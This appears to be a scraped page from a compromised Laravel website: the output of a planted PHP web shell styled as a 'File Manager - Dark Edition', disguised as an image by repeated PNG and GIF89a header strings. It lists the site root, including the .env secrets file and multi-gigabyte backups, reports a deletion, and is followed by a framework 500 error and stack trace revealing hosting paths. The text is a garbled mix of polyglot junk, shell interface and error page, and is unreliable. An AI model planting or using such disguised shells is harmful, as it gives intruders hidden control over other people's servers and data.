PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! PNG %k25u25%fgd5n!PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! (>^ω^<)看过哭02te"\"\ $假PNG头 = "\x89PNG\r\n\x1a\n"; $假PNG头 = "\x89PNG\r\n\x1a\n"; PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! GIF89a PHP Polyglot Example

PHP Polyglot Demo

File Manager - Dark Edition

📁 File Manager - Dark Edition

PHP: 8.2.30 Server: LiteSpeed OS: Linux 5.14.0-611.26.1.el9_7.x86_64 User:
Deleted successfully
Name Type Size Permissions Modified Actions
📁 Parent Directory
📁 Folders
📁 app Folder - rwxr-xr-x 2026-04-30 09:39
📁 config Folder - rwxr-xr-x 2026-04-30 06:19
📁 public Folder - rwxr-xr-x 2026-04-30 09:31
📁 resources Folder - rwxr-xr-x 2025-03-14 19:41
📁 routes Folder - rwxr-xr-x 2025-06-05 04:10
📁 sdfsfdsf Folder - rwxr-xr-x 2026-04-30 09:39
📁 storage Folder - rwxr-xr-x 2025-03-14 19:41
📁 tests Folder - rwxr-xr-x 2025-03-14 19:41
📁 vendor Folder - rwxr-xr-x 2025-03-14 19:41
📄 Files
📄 .editorconfig EDITORCONFIG 258 B rw-r--r-- 2025-03-14 19:41
📄 .env ENV 1.3 KB rw-r--r-- 2026-04-30 09:32
📄 .htaccess HTACCESS 927 B rw-r--r-- 2026-04-30 09:29
📄 13-june-2025.zip ZIP 307.5 KB rw-r--r-- 2025-06-13 18:23
📄 april_01.zip ZIP 2.6 GB rw-r--r-- 2025-04-01 04:42
📄 artisan FILE 1.6 KB rw-r--r-- 2025-03-14 19:41
📄 composer.json JSON 1.9 KB rw-r--r-- 2025-03-14 19:41
📄 composer.lock LOCK 302.5 KB rw-r--r-- 2025-03-14 19:41
📄 package.json JSON 226 B rw-r--r-- 2025-03-14 19:41
📄 README.md MD 4.1 KB rw-r--r-- 2025-03-14 19:41
📄 robots.txt TXT 79 B rw-r--r-- 2026-04-30 09:33
📄 vendor.zip ZIP 24.9 MB rw-r--r-- 2025-05-17 10:36
📄 vite.config.js JS 263 B rw-r--r-- 2025-03-14 19:41
The /home/u114198598/domains/thehiddenhimalaya.com/public_html/bootstrap/cache directory must be present and writable. (500 Internal Server Error)

Symfony Exception

Exception

HTTP 500 Internal Server Error

The /home/u114198598/domains/thehiddenhimalaya.com/public_html/bootstrap/cache directory must be present and writable.

Exception

Exception

  1.      * @throws \Exception
  2.      */
  3.     protected function write(array $manifest)
  4.     {
  5.         if (! is_writable($dirname dirname($this->manifestPath))) {
  6.             throw new Exception("The {$dirname} directory must be present and writable.");
  7.         }
  8.         $this->files->replace(
  9.             $this->manifestPath'<?php return '.var_export($manifesttrue).';'
  10.         );
  1.             $packages $installed['packages'] ?? $installed;
  2.         }
  3.         $ignoreAll in_array('*'$ignore $this->packagesToIgnore());
  4.         $this->write(collect($packages)->mapWithKeys(function ($package) {
  5.             return [$this->format($package['name']) => $package['extra']['laravel'] ?? []];
  6.         })->each(function ($configuration) use (&$ignore) {
  7.             $ignore array_merge($ignore$configuration['dont-discover'] ?? []);
  8.         })->reject(function ($configuration$package) use ($ignore$ignoreAll) {
  9.             return $ignoreAll || in_array($package$ignore);
  1.         if (! is_null($this->manifest)) {
  2.             return $this->manifest;
  3.         }
  4.         if (! is_file($this->manifestPath)) {
  5.             $this->build();
  6.         }
  7.         return $this->manifest is_file($this->manifestPath) ?
  8.             $this->files->getRequire($this->manifestPath) : [];
  9.     }
  1.      * @param  string  $key
  2.      * @return array
  3.      */
  4.     public function config($key)
  5.     {
  6.         return collect($this->getManifest())->flatMap(function ($configuration) use ($key) {
  7.             return (array) ($configuration[$key] ?? []);
  8.         })->filter()->all();
  9.     }
  10.     /**
  1.      *
  2.      * @return array
  3.      */
  4.     public function aliases()
  5.     {
  6.         return $this->config('aliases');
  7.     }
  8.     /**
  9.      * Get all of the values for all packages for the given configuration name.
  10.      *
  1.         Facade::setFacadeApplication($app);
  2.         AliasLoader::getInstance(array_merge(
  3.             $app->make('config')->get('app.aliases', []),
  4.             $app->make(PackageManifest::class)->aliases()
  5.         ))->register();
  6.     }
  7. }
  1.         $this->hasBeenBootstrapped true;
  2.         foreach ($bootstrappers as $bootstrapper) {
  3.             $this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
  4.             $this->make($bootstrapper)->bootstrap($this);
  5.             $this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
  6.         }
  7.     }
  1.      * @return void
  2.      */
  3.     public function bootstrap()
  4.     {
  5.         if (! $this->app->hasBeenBootstrapped()) {
  6.             $this->app->bootstrapWith($this->bootstrappers());
  7.         }
  8.     }
  9.     /**
  10.      * Get the route dispatcher callback.
  1.     {
  2.         $this->app->instance('request'$request);
  3.         Facade::clearResolvedInstance('request');
  4.         $this->bootstrap();
  5.         return (new Pipeline($this->app))
  6.                     ->send($request)
  7.                     ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
  8.                     ->then($this->dispatchToRouter());
  1.         $this->requestStartedAt Carbon::now();
  2.         try {
  3.             $request->enableHttpMethodParameterOverride();
  4.             $response $this->sendRequestThroughRouter($request);
  5.         } catch (Throwable $e) {
  6.             $this->reportException($e);
  7.             $response $this->renderException($request$e);
  8.         }

Stack Trace

Exception
Exception:
The /home/u114198598/domains/thehiddenhimalaya.com/public_html/bootstrap/cache directory must be present and writable.

  at /home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php:178
  at Illuminate\Foundation\PackageManifest->write()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php:131)
  at Illuminate\Foundation\PackageManifest->build()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php:107)
  at Illuminate\Foundation\PackageManifest->getManifest()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php:90)
  at Illuminate\Foundation\PackageManifest->config()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php:79)
  at Illuminate\Foundation\PackageManifest->aliases()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/RegisterFacades.php:26)
  at Illuminate\Foundation\Bootstrap\RegisterFacades->bootstrap()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Application.php:263)
  at Illuminate\Foundation\Application->bootstrapWith()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:186)
  at Illuminate\Foundation\Http\Kernel->bootstrap()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:170)
  at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:144)
  at Illuminate\Foundation\Http\Kernel->handle()
     (/home/u114198598/domains/thehiddenhimalaya.com/public_html/index.php:55)